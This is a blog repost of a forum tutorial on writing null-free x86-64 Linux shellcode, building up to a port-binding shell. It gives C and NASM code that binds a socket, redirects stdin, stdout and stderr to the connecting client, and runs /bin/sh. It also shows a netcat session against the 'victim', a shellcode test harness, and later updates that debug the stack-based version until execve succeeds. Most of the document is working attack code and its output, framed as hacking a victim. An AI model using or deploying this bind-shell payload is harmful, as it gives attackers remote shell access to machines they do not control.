[ + ] Repost of Shellcode Programming

Due to the lack of available info on the topic, I've decided to re-post this on my blog; it's something I'd like to look back on if I need it:

Before writing this I thought about how hard I had worked on this matter (about two weeks of constant hammering) and how it opened doors that had been closed to me because so much has changed over time. I also know what this community stands for, and that without it and someone to guide me on this journey I'd be lost as hell. So I figured I'd give back by sharing what I've learned recently: creating shellcode for a port-bind attack. The difference between the common way of making it and my version is that I use a more logical and concise method. To preface this, I'm going to assume that you know x64 ASM, C network programming, and the basics of using Linux. I am also trusting that this post stays within the Soldierx community; I strongly support this community and hope to see its members benefit from this information.

If you don't know x64 ASM, I would recommend using Ray Seyfarth's Intro to x64 on Linux (and Windows for future projects):
https://www.amazon.com/s/ref=dp_byline_sr_book_1?ie=UTF8&text=Ray+Seyfar...
If you don't know C network programming I highly recommend Linux Socket Programming By Example by Warren Gay:
https://www.amazon.com/Linux-Socket-Programming-Example-Warren/dp/078972...

A lot of sources on shellcode and assembly are outdated, which is the biggest obstacle when reading something like The Shellcoder's Handbook: many of the techniques no longer work as written. Code written for 32-bit x86 does not carry over directly to x86-64, because the registers, the instruction encodings, and the system call convention (syscall instead of int 0x80, different syscall numbers, arguments in rdi, rsi, rdx) all changed. Why shellcode? Because you can inject shellcode into a running process on the victim's machine; how to do that I'll save for another time. The first thing to start with is a simple Hello World in C:

int main(int argc, char **argv)

{

        write(1, "Hello, World!", 13);

}

Now if you copy and compile this using gcc and run the resulting a.out file you'll get the famous hello world (older gcc versions only warn about the missing declaration; newer ones may reject it, in which case add #include <unistd.h>). But what you should be asking is why did I write it like this? No headers included or anything? The reason is that write() is a thin wrapper around a system call (syscall), a request handled directly by the kernel. printf(), by contrast, is a C library function that formats the string and then ends up calling write(). Each syscall is identified by a number; on x86-64 Linux they start at 0 and run into the hundreds, and they are defined in a header reached through unistd.h. On Ubuntu, which is what I'm using, the file that actually holds the 64-bit numbers is unistd_64.h, because the 32-bit and 64-bit ABIs use different numbers for the same syscall. To find where the file lives, use the find command and then cat the result in a terminal:

find /usr/include -name unistd_64.h

cat <what you get here>

You can also look for syscall values on the internet for example on this page:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

So let's use what we know to write our hello world program in assembly using the write syscall:

section .data

    msg db      "hello, world!"

section .text

    global _start

_start:

    mov     rax, 1

    mov     rdi, 1

    mov     rsi, msg

    mov     rdx, 13

    syscall

    mov    rax, 60

    mov    rdi, 0

    syscall

Use nasm to assemble it and ld to link the resulting object file:

nasm -f elf64 -g hello.asm

ld -o hello hello.o

./hello

This should print out hello, world. Then you can objdump it to disassemble the binary and see the resulting shellcode:

$objdump -d hello

hello:     file format elf64-x86-64

Disassembly of section .text:

00000000004000b0 <_start>:

  4000b0:       b8 01 00 00 00          mov    $0x1,%eax

  4000b5:       bf 01 00 00 00          mov    $0x1,%edi

  4000ba:       48 be d8 00 60 00 00    movabs $0x6000d8,%rsi

  4000c1:       00 00 00 

  4000c4:       ba 0d 00 00 00          mov    $0xd,%edx

  4000c9:       0f 05                   syscall 

  4000cb:       b8 3c 00 00 00          mov    $0x3c,%eax

  4000d0:       bf 00 00 00 00          mov    $0x0,%edi

  4000d5:       0f 05                   syscall 

                ^ shellcode  ^

The problem with this shellcode is that it contains too many null bytes (00). Shellcode is usually delivered to the target through string-handling code such as strcpy(), which treats a null byte as the end of the string, so everything after the first 00 is cut off and never reaches memory. I should add that shellcode is simply the raw opcode bytes that the processor executes. Take the first mov instruction as an example:

\xb8\x01 --- seen by the processor as --> 1011 1000 0000 0001: \xb8 is the opcode for moving a 32-bit immediate into eax (the low half of rax), and \x01 is the low byte of the value 0x1 being moved.

The extra 00s are there because the immediate is encoded as a full 32-bit value, so 1 is stored as 01 00 00 00. Using a smaller part of the register gives a shorter encoding, which leads to me showing you this:
https://imgur.com/a/rWUz75J

There are four ways to get rid of null bytes, and I will show you how the first three are done after explaining them:
1-push the value into the stack and pop it into the register
2-move the value into the first 8 bits (or 1 byte) of the register
3-using the jump and call trick
4-for strings, write each character using ascii hex characters into the appropriate registers

And here's our hello world without all the null bytes:

global _start

section .text       

_start:

    jmp short data

shellcode:

    xor     rax,rax 

    xor     rdi, rdi

    xor     rsi, rsi

    xor     rdx, rdx

    mov     al, 1       ;2-moving into lowest byte of register

    push    byte 1      ;1-pushing the value into stack

    pop     rdi         ;1-and then popping it

    pop     rsi         ;3-popping the address of msg from stack

    mov     dl, 13      ;2-moving the length into lowest byte of register

    syscall

    mov     al, 60

    mov     dil, 1

    syscall

data:

    call shellcode

    msg     db "Hello, World!"

Now compile it like before and objdump it:

$ objdump -d hello

hello:     file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:

  400080:       eb 1d                   jmp    40009f <data>

0000000000400082 <shellcode>:

  400082:       48 31 c0                xor    %rax,%rax

  400085:       48 31 ff                xor    %rdi,%rdi

  400088:       48 31 f6                xor    %rsi,%rsi

  40008b:       48 31 d2                xor    %rdx,%rdx

  40008e:       b0 01                   mov    $0x1,%al

  400090:       6a 01                   pushq  $0x1

  400092:       5f                      pop    %rdi

  400093:       5e                      pop    %rsi

  400094:       b2 0d                   mov    $0xd,%dl

  400096:       0f 05                   syscall 

  400098:       b0 3c                   mov    $0x3c,%al

  40009a:       40 b7 01                mov    $0x1,%dil

  40009d:       0f 05                   syscall 

000000000040009f <data>:

  40009f:       e8 de ff ff ff          callq  400082 <shellcode>

00000000004000a4 <msg>:

  4000a4:       48                      rex.W

  4000a5:       65 6c                   gs insb (%dx),%es:(%rdi)

  4000a7:       6c                      insb   (%dx),%es:(%rdi)

  4000a8:       6f                      outsl  %ds:(%rsi),(%dx)

  4000a9:       2c 20                   sub    $0x20,%al

  4000ab:       57                      push   %rdi

  4000ac:       6f                      outsl  %ds:(%rsi),(%dx)

  4000ad:       72 6c                   jb     40011b <msg+0x77>

  4000af:       64                      fs

  4000b0:       21                      .byte 0x21

And it's free of null bytes!

Now all you have to do is extract and test the shellcode. To do this I've wrapped a one-line command, written by someone else on the internet, in a simple bash script that pulls the opcode bytes out of the objdump output:

#!/bin/bash

PROGRAM=$1

objdump -d ./${PROGRAM}|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' 

Save this into a file (I named mine extract-shell), make it executable with chmod +x, then run it against the hello program to get:

$ ./extract-shell hello

"\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21"

Then copy and paste this into our C code to test the shellcode itself (I named mine test.c):

char code[]="\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21";

int main(int argc, char **argv)

{

        int (*func)();

        func = (int (*)()) code;

        (int)(*func)();

}

Compile this code and run it like so (-z execstack is a linker option that marks the stack as executable, so no separate execstack package is needed for this command):

$gcc -fno-stack-protector -z execstack test.c

$./a.out

Hello, World!

So now that you know how to write shellcode, the next step is making it do something useful, like port-binding shellcode. The theory is simple: the shellcode binds a socket to an IP address and port, listens, and accepts a connection. It then duplicates the client socket onto the stdin, stdout, and stderr file descriptors, so that when you, for example, execute a write syscall on stdout, the data goes to the client socket instead of the terminal.

1) the victim becomes a server <---- you (the hacker) connect to the victim running this shellcode
2) the shellcode uses an execve syscall to start a shell

Here's the C code I wrote for it. In this case I'm using my private IP of 192.168.1.16 and port 1234 as the target:

#include <sys/socket.h>

#include <netinet/in.h>

#include <stdlib.h>

#include <unistd.h>

#include <arpa/inet.h>

#include <stdio.h>

int main()

{

        // Create the socket (man socket)

        // AF_INET for IPv4

        // SOCK_STREAM for TCP connection

        int host_sock = socket(AF_INET, SOCK_STREAM, 0);

        // Create sockaddr_in struct (man 7 ip)

        struct sockaddr_in host_addr;

        host_addr.sin_family = AF_INET;

        host_addr.sin_port = htons(1234);

        host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");

        // Bind address to socket (man bind)

        bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        // Use the created socket to listen for connections (man listen)

        listen(host_sock, 0);

        // Accept connections, (man 2 accept) use NULLs to not store connection information from peer

        int client_sock = accept(host_sock, NULL, NULL);

        // Redirect stdin, stdout, stderr to client

        dup2(client_sock, 0);

        dup2(client_sock, 1);

        dup2(client_sock, 2);

        // Execute /bin/sh (man execve)

        execve("/bin/sh", NULL, NULL);

}

When you compile and run this, it waits until the hacker connects to it. To connect to the victim I'm going to use netcat, a program that comes with most Linux systems (builds also exist for Windows):

$nc 192.168.1.16 1234

echo hello!

hello!

id

uid=1000(ghost) gid=1000(ghost) groups=1000(ghost),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),128(kvm),129(ubridge),132(libvirt)

Writing the shellcode for this is harder than writing the assembly for it. What distinguishes this post from anything else available in the 4% of the internet that we can see is that I used a C-style struct in the assembly (no C involved, I promise) and laid out the syscalls in the same order and form as the C code, with no fancy assembly instructions or tricks to fill in the blanks:

segment .data

;struct sockaddr_in host_addr;

;host_addr.sin_family = AF_INET;

;host_addr.sin_port = htons(1234);

;host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");

struc sockaddr_in

        sin_family  resw 1              ;allocate 2 bytes 

        sin_port        resw 1          ;allocate 2 bytes

        sin_addr        resd 1          ;allocate 4 bytes (for 32 bit address)

        sin_zero        resb 8          ;allocate 8 bytes (for the 0 padding)

endstruc

host_addr istruc sockaddr_in

        at sin_family, dw 0x02

        at sin_port, dw 0xd204          ;port 1234 is 0x04d2; written byte-swapped so memory holds 04 d2 (network byte order)

        at sin_addr, dd 0x1001A8C0  ;address 192.168.1.16

        at sin_zero, db 0

iend

msg db "got here"

bin db "/bin/sh", 0             ;null-terminated path for execve

segment .text

        global _start

_start:

        ;sock= socket(AF_INET, SOCK_STREAM, 0)

        mov     rax,41

        mov             rdi,2                 ; got these values from the socket.h header file can use find /usr/include -name socket.h to find it

        mov             rsi,1

        mov             rdx,0                   ;protocol 0, the third argument of socket()

        syscall

        mov             rbx,rax                 ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx 

        mov             rax,49                  ;load the syscall value for bind

        mov             rdi,rbx                 ;load the file descriptor we saved earlier

        mov             rsi,host_addr   ;load the address of the struct

        mov             rdx,16                  ;the size is 16 bytes

        syscall

        cmp             rax,0

        jl              exit

        ;listen(host_sock, 0);

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             rax,50                  ;load the syscall value for listen

        mov             rdi,rbx                 ;load the file descriptor

        syscall 

        ;int client_sock = accept(host_sock, NULL, NULL);

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             rax,43                  ;load the syscall value for accept

        mov             rdi,rbx                 ;load the file descriptor

        syscall

        mov             rcx,rax                 ;save the client file descriptor

        ;duplicate the file descriptors into stdin, stdout,stderr

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        mov             rax, 33

        mov             rdi, rcx

        mov             rsi, 0

        syscall

        xor     rax,rax

        mov             rax, 33

        mov             rsi, 1

        syscall

        xor     rax,rax

        mov             rax, 33

        mov             rsi, 2

        syscall

        ;and finally execute /bin/sh

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             rax,59

        mov             rdi,bin

        syscall

        ;print got here (for debugging purposes)

        xor             rax, rax

        mov     rax,1

        xor             rdi, rdi

        mov             rdi,1

        xor             rsi,rsi

        mov             rsi, msg

        mov             rdx, 8 

        syscall

exit:

        ;exit

        xor             rax,rax

        mov             rax,60

        xor             rdi,rdi

        syscall

If you need help understanding how I wrote my structure, you can check out this other post I made on the programming forums here:
https://www.soldierx.com/bbs/201809/Using-structures-NASM-x64-Assembly

The way this works is that you have to know that the sockaddr_in struct is exactly 16 bytes long. Go over 16 bytes and the address won't be filled in properly; go under and, in my experience, you end up with a segmentation fault when the bind() syscall gets executed. After that, the rest is just filling in the blanks for the individual syscalls. As you write this, you can use strace to see how each syscall is being filled out, keeping in mind that 1) every syscall has a return value, and 2) that return value comes back in rax:

$ strace -e socket,bind,listen,accept,dup2 ./portbindasm

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3

bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0

listen(3, 0)                            = 0

accept(3, NULL, NULL)                   = 4

dup2(4, 0)                              = 0

dup2(4, 1)                              = 1

dup2(4, 2)                              = 2

----should pause here if everything goes smoothly---

+++ exited with 0 +++

And with that I'm going to stop here and let you, the reader, figure out how to write the shellcode for this. Until next time thanks for reading!

-------------------------------------[UPDATE:9/28/18]-----------------------------------------------------------------------------------------

I have to admit that before testing this I only had a working theory that my assembly would still work once the null bytes were removed. After writing my null-free iteration, it did work as a standalone program. Then a new problem arose: when I inserted the resulting shellcode into the C test code, strace showed a lot of garbage values, and the address structure and everything else were not filled in correctly. For instance, the socket and bind syscalls would turn out as:

socket(AF_INET, SOCK_DGRAM|SIGEV, 0xffffffffffffffffff63) = -1 [ERROR BAD ADDRESS]

bind(243, {sa_family=AF_INET, sin_port=htons(56865), sin_addr=inet_addr(0xfffffffffffffff2131123213)}, 16) = -1

As a result I did things the traditional way: instead of defining the sockaddr_in structure in .data as before, I pushed its values onto the stack and pointed rsi at the top of the stack, as shown below:

segment .text

        global _start

_start:

        ;sock= socket(AF_INET, SOCK_STREAM, 0)

        push    41

        pop             rax

        push    2

        pop     rdi

        push    1

        pop             rsi

        xor             rdx,rdx

        syscall

        mov             rbx,rax                         ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        mov             al,49                   ;load the syscall value for bind

        mov             dil,bl                  ;load the file descriptor we saved earlier

        ;build the sockaddr struct

        push    dword 0x1001A8C0;push my ip address into stack

        push    word  0xd204    ;push my port into stack

        push    word  2                 ;push the value for AF_INET 

        mov             rcx,rsp                 ;move the stack pointer into rcx

        mov             rsi,rcx                 ;move rcx into the second argument of bind()

        mov             dl,16                   ;the size is 16 bytes

        syscall

        ;listen(host_sock, 0);

        xor             rax,rax                 ;zero out the argument registers

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             al,50                   ;load the syscall value for listen

        mov             dil,bl                  ;load the file descriptor

        syscall 

        ;int client_sock = accept(host_sock, NULL, NULL);

        xor             rax,rax                 ;zero out the argument registers

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             al,43                   ;load the syscall value for accept

        mov             dil,bl                  ;load the file descriptor

        syscall

        mov             cl,al                   ;save the client file descriptor

        ;duplicate the file descriptors into stdin, stdout,stderr

        xor             rax,rax                 ;zero out the argument registers

        xor             rdi,rdi

        xor             rsi,rsi

        mov             al, 33

        mov             dil, cl

        syscall

        xor     rax,rax

        mov             al, 33

        mov             sil, 1

        syscall

        xor     rax,rax

        mov             al, 33

        mov             sil, 2

        syscall

        ;finally execute execve (where the problem is)

        xor     rax,rax

        push    rax

        xor     rdx,rdx

        xor     rsi,rsi

        mov     rbx,0x68732f2f6e69622f

        push    rbx

        push    rsp

        pop     rdi

        mov     al,0x3b 

        syscall

        ;exit

        xor             rax,rax

        mov             al,60

        xor             rdi,rdi

        syscall

After putting the shellcode generated from this into the C test code, the problem shows up in the execve call, where what should be "/bin//sh" turns into "/bin/shS", meaning one byte is getting in the way of this finally executing:

$ strace -e socket,bind,accept,dup2,execve ./a.out

execve("./a.out", ["./a.out"], 0x7fffa9515d50 /* 58 vars */) = 0

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3

bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0

accept(3, NULL, NULL)                   = 4

dup2(4, 0)                              = 0

dup2(4, 1)                              = 1

dup2(4, 2)                              = 2

execve("/bin/shS", NULL, NULL)          = -1 ENOENT (No such file or directory) <------------problem

                        ^

I have tried a lot of the suggestions spread around the internet. At this point I'm thinking it could be Ubuntu. If you find anything that makes it work, feel free to reply; until I figure out how to fix this, all I can do is apologize and keep looking for a solution.

-------------------------------------[UPDATE:9/29/18]-----------------------------------------------------------------------------------------
At last, I have found the persistent problem with my code: execve was getting the wrong bytes from the shellcode. I was puzzled that when I tried other people's solutions to the execve problem, by retyping the exact same x64 code and running it the way I showed in this tutorial, execve still ended up with a version of "/bin/sh" that didn't work. So I figured, what if I copy and paste the shellcode straight from the Exploit-DB page? It worked, and the author had shown the objdump of the execve file along with it. Then it hit me: what if my shellcode wasn't being extracted correctly this whole time? That was exactly the case. Here, I'll show you:

$ objdump --disassemble execve

execve:     file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:

  400080:       48 31 c0                xor    %rax,%rax

  400083:       50                      push   %rax

  400084:       48 31 d2                xor    %rdx,%rdx

  400087:       48 31 f6                xor    %rsi,%rsi

  40008a:       48 bb 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rbx

  400091:       2f 73 68 

  400094:       53                      push   %rbx

  400095:       54                      push   %rsp

  400096:       5f                      pop    %rdi

  400097:       b0 3b                   mov    $0x3b,%al

  400099:       0f 05                   syscall 

$ ./extract-shell execve

"\x48\x31\xc0\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

                                                                                  ^if you notice, after \xbb\x2f there should be another \x2f

The idea of the execve shellcode is to use either "//bin/sh" or "/bin//sh": "/bin/sh" is only 7 characters, and the extra slash pads it to exactly 8 bytes, so it fills one 64-bit register (and one 8-byte stack slot) with no null byte left over. The kernel treats the doubled slash as a single one, so execve handles our little "typo" without complaint. The byte went missing because the extract script keeps only six bytes per line (cut -f1-6), while objdump prints up to seven, so the seventh byte of the movabs line was dropped. To fix this you can simply add the missing \x2f by hand (changing the script to cut -f1-7 should avoid the problem in the first place); testing the resulting shellcode then gives:

$ strace -e socket,dup2,accept,bind,execve ./a.out

execve("./a.out", ["./a.out"], 0x7fffffffdfd0 /* 58 vars */) = 0

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3

bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0

accept(3, NULL, NULL)                   = 4

dup2(4, 0)                              = 0

dup2(4, 1)                              = 1

dup2(4, 2)                              = 2

execve("//bin/sh", NULL, NULL)          = 0

Success!
